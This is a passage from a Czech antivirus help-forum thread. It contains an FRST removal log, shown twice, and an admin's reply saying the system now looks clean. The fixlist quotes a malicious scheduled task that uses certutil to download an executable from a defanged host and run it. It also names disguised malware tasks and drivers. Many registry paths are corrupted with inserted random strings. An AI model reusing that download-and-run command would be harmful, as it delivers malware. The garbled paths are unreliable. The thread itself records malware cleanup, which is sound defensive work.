"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{93DFD860-E586-4829-B68C-290557118ECF}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{93DFD860-E586-4829-B68C-290557118ECF}" => removed successfully
C:\Windows\System32\Tasks\csrss => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{93DFD860-E586-4829-B68C-290557118ECF}" => not found
"C:\Windows\System32\Tasks\csrss" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => not found
HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7gins\@microsoft.com/GENUINE => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7es\MBAMService => removed successfully
MBAMService => service removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7es\WinmonFS => removed successfully
WinmonFS => service removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7es\WinmonProcessMonitor => removed successfully
WinmonProcessMonitor => service removed successfully
C:\Windows\system32\Tasks\{E0E271FE-355F-411F-8E13-4141203B01DE} => moved successfully
"C:\Windows\system1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw" => not found
"C:\Windows\system1GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGie" => not found
C:\Users\Jomko\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini => moved successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeaverlayIdentifiers\ MEGA (Pending) => removed successfully
HKLM\Software\Classes\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeaverlayIdentifiers\ MEGA (Synced) => removed successfully
HKLM\Software\Classes\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeaverlayIdentifiers\ MEGA (Syncing) => removed successfully
HKLM\Software\Classes\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeaverlayIdentifiers\00asw => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s MEGA (Pending) => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7SID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s MEGA (Synced) => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7SID\{05B38830-F4E9-4329-978B-1DD28605D202} => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s MEGA (Syncing) => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7SID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => removed successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\ESET Security Shell => removed successfully
HKLM\Software\Classes\CLSID\{B089FE88-FB52-11D3-BDF1-0050DA34150D} => removed successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLM\Software\Classes\CLSID\{0229E5E7-09E9-45CF-9228-0228EC7D5F17} => removed successfully
HKLM\Software\Classes\*\ShellEx\ContextLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7rterFileOpreation => removed successfully
HKLM\Software\Classes\CLSID\{FEB746CA-95C2-485F-B386-C30D4E56D22E} => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ContextMenuHandlers\ESET Security Shell => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCealers\MEGA (Context menu) => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7rmsCe65wKzPTw5jtS38n2tVEGiGA (Context menu) => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCealers\igfxcui => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7\ContextMenuHandlers\ESET Security Shell => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9sSVC-In-TCP" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9sSVC-In-TCP-NoScope" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s Query User{9747B657-A166-43E8-831D-33F204BC2790}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s Query User{23B54518-BFAE-44C0-BD71-1342B40C49A7}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{36E5F241-C08F-46E0-9466-1BC748A813DD}" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s Query User{65CCA3BC-5E01-4C02-8A65-D444D4094BDA}C:\program files (x86)\emule\emule.exe" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s Query User{5AA0508D-A7ED-409E-8567-CA6F25C48CC2}C:\program files (x86)\emule\emule.exe" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{F9AB2B23-2AC6-4DE0-A7FB-1DB375AED956}" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{72A5A12A-716B-4CFA-BD0C-3A90C219130B}" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s Query User{4218553C-8414-4FC1-AC03-AABE1168B85F}C:\program files\java\jre1.8.0_231\bin\javaw.exe" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s Query User{B0D9DA1F-9B8B-4AB9-862B-90F0B455C8B4}C:\program files\java\jre1.8.0_231\bin\javaw.exe" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{63563E85-64C7-44E9-BB6F-8669228E4EF9}" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{E5FB062C-8C90-4693-89F6-FB1FDBE0DE5B}" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{E3904F86-8649-41ED-8BE1-960F80CE1B03}" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{2D08EE70-88F2-4649-8299-B182B79733E6}" => removed successfully
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 5486092 B
Java, Flash, Steam htmlcache => 1080 B
Windows/system/drivers => 628941254 B
Edge => 0 B
Chrome => 291645840 B
Firefox => 882470961 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 16802 B
systemprofile32 => 83158 B
LocalService => 83158 B
NetworkService => 124878 B
Jomko => 123082262 B
RecycleBin => 0 B
EmptyTemp: => 1.8 GB temporary data Removed.
================================
The system needed a reboot.
==== End of Fixlog 22:55:16 ====
Ran by Jomko (07-02-2020 22:54:55) Run:1
Running from C:\Users\Jomko\Desktop
Loaded Profiles: Jomko (Available Profiles: Jomko)
Boot Mode: Normal
==============================================
fixlist content:
*****************
Start
CloseProcesses:
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [646160 2019-12-11] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Run: [CloudNet] => C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2020-02-07] (EpicNet Inc.) [File not signed] <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {28B0A694-674F-4F77-AE22-288A79215844} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://bestblues.tech/app/app.exe C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe && C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe /31340 <==== ATTENTION
Task: {93DFD860-E586-4829-B68C-290557118ECF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3962368 2020-01-22] () [File not signed] <==== ATTENTION
Task: {93DFD860-E586-4829-B68C-290557118ECF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3962368 2020-01-22] () [File not signed] <==== ATTENTION
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
U3 MBAMService; no ImagePath
S3 WinmonFS; \??\C:\Windows\System32\drivers\WinmonFS.sys [X]
S1 WinmonProcessMonitor; \??\C:\Windows\System32\drivers\WinmonProcessMonitor.sys [X]
C:\Windows\system32\Tasks\{E0E271FE-355F-411F-8E13-4141203B01DE}
C:\Windows\system1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw
C:\Windows\system1GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGie
C:\Users\Jomko\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [WondershareVideoConverterFileOpreation] -> {FEB746CA-95C2-485F-B386-C30D4E56D22E} => C:\Windows\SysWOW64\WSCM64.dll -> No File
ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [TCP Query User{9747B657-A166-43E8-831D-33F204BC2790}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [UDP Query User{23B54518-BFAE-44C0-BD71-1342B40C49A7}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [{36E5F241-C08F-46E0-9466-1BC748A813DD}] => (Allow) C:\Users\Jomko\AppData\Local\Temp\7zS4058\HP.EasyStart.exe No File
FirewallRules: [TCP Query User{65CCA3BC-5E01-4C02-8A65-D444D4094BDA}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [UDP Query User{5AA0508D-A7ED-409E-8567-CA6F25C48CC2}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{F9AB2B23-2AC6-4DE0-A7FB-1DB375AED956}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{72A5A12A-716B-4CFA-BD0C-3A90C219130B}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [TCP Query User{4218553C-8414-4FC1-AC03-AABE1168B85F}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [UDP Query User{B0D9DA1F-9B8B-4AB9-862B-90F0B455C8B4}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [{63563E85-64C7-44E9-BB6F-8669228E4EF9}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E5FB062C-8C90-4693-89F6-FB1FDBE0DE5B}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E3904F86-8649-41ED-8BE1-960F80CE1B03}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{2D08EE70-88F2-4649-8299-B182B79733E6}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
EmptyTemp:
End
*****************
Processes closed successfully.
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeanJavaUpdateSched" => removed successfully
"HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Software\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7un\\CloudNet" => removed successfully
HKLM\SOFTWARE\Policies\Google => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{28B0A694-674F-4F77-AE22-288A79215844}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{28B0A694-674F-4F77-AE22-288A79215844}" => removed successfully
C:\Windows\System32\Tasks\ScheduledUpdate => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{93DFD860-E586-4829-B68C-290557118ECF}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{93DFD860-E586-4829-B68C-290557118ECF}" => removed successfully
C:\Windows\System32\Tasks\csrss => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{93DFD860-E586-4829-B68C-290557118ECF}" => not found
"C:\Windows\System32\Tasks\csrss" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => not found
HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7gins\@microsoft.com/GENUINE => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7es\MBAMService => removed successfully
MBAMService => service removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7es\WinmonFS => removed successfully
WinmonFS => service removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7es\WinmonProcessMonitor => removed successfully
WinmonProcessMonitor => service removed successfully
C:\Windows\system32\Tasks\{E0E271FE-355F-411F-8E13-4141203B01DE} => moved successfully
"C:\Windows\system1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw" => not found
"C:\Windows\system1GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGie" => not found
C:\Users\Jomko\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini => moved successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeaverlayIdentifiers\ MEGA (Pending) => removed successfully
HKLM\Software\Classes\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeaverlayIdentifiers\ MEGA (Synced) => removed successfully
HKLM\Software\Classes\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeaverlayIdentifiers\ MEGA (Syncing) => removed successfully
HKLM\Software\Classes\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeaverlayIdentifiers\00asw => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s MEGA (Pending) => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7SID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s MEGA (Synced) => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7SID\{05B38830-F4E9-4329-978B-1DD28605D202} => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s MEGA (Syncing) => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7SID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => removed successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\ESET Security Shell => removed successfully
HKLM\Software\Classes\CLSID\{B089FE88-FB52-11D3-BDF1-0050DA34150D} => removed successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLM\Software\Classes\CLSID\{0229E5E7-09E9-45CF-9228-0228EC7D5F17} => removed successfully
HKLM\Software\Classes\*\ShellEx\ContextLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7rterFileOpreation => removed successfully
HKLM\Software\Classes\CLSID\{FEB746CA-95C2-485F-B386-C30D4E56D22E} => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ContextMenuHandlers\ESET Security Shell => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCealers\MEGA (Context menu) => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7rmsCe65wKzPTw5jtS38n2tVEGiGA (Context menu) => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCealers\igfxcui => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7\ContextMenuHandlers\ESET Security Shell => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9sSVC-In-TCP" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9sSVC-In-TCP-NoScope" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s Query User{9747B657-A166-43E8-831D-33F204BC2790}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s Query User{23B54518-BFAE-44C0-BD71-1342B40C49A7}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{36E5F241-C08F-46E0-9466-1BC748A813DD}" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s Query User{65CCA3BC-5E01-4C02-8A65-D444D4094BDA}C:\program files (x86)\emule\emule.exe" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s Query User{5AA0508D-A7ED-409E-8567-CA6F25C48CC2}C:\program files (x86)\emule\emule.exe" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{F9AB2B23-2AC6-4DE0-A7FB-1DB375AED956}" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{72A5A12A-716B-4CFA-BD0C-3A90C219130B}" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s Query User{4218553C-8414-4FC1-AC03-AABE1168B85F}C:\program files\java\jre1.8.0_231\bin\javaw.exe" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s Query User{B0D9DA1F-9B8B-4AB9-862B-90F0B455C8B4}C:\program files\java\jre1.8.0_231\bin\javaw.exe" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{63563E85-64C7-44E9-BB6F-8669228E4EF9}" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{E5FB062C-8C90-4693-89F6-FB1FDBE0DE5B}" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{E3904F86-8649-41ED-8BE1-960F80CE1B03}" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{2D08EE70-88F2-4649-8299-B182B79733E6}" => removed successfully
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 5486092 B
Java, Flash, Steam htmlcache => 1080 B
Windows/system/drivers => 628941254 B
Edge => 0 B
Chrome => 291645840 B
Firefox => 882470961 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 16802 B
systemprofile32 => 83158 B
LocalService => 83158 B
NetworkService => 124878 B
Jomko => 123082262 B
RecycleBin => 0 B
EmptyTemp: => 1.8 GB temporary data Removed.
================================
The system needed a reboot.
==== End of Fixlog 22:55:16 ====
-
Rudy
- Site Admin
- Příspěvky: 118275
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Prosím o kontrolu logu FRST
Smazáno, log již vypadá čistý. Upozornění: ComboFix jako laik nikdy nespouštějte bez předchozí kontroly nedestruktivním skenerem (např. FRST). CF nenávratně maže některé věci, které byste mohl potřebovat, je nutné další dočištění pomocí skriptu a pokud nevíte, jak ho sestavit, může i poškodit systém.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: Prosím o kontrolu logu FRST
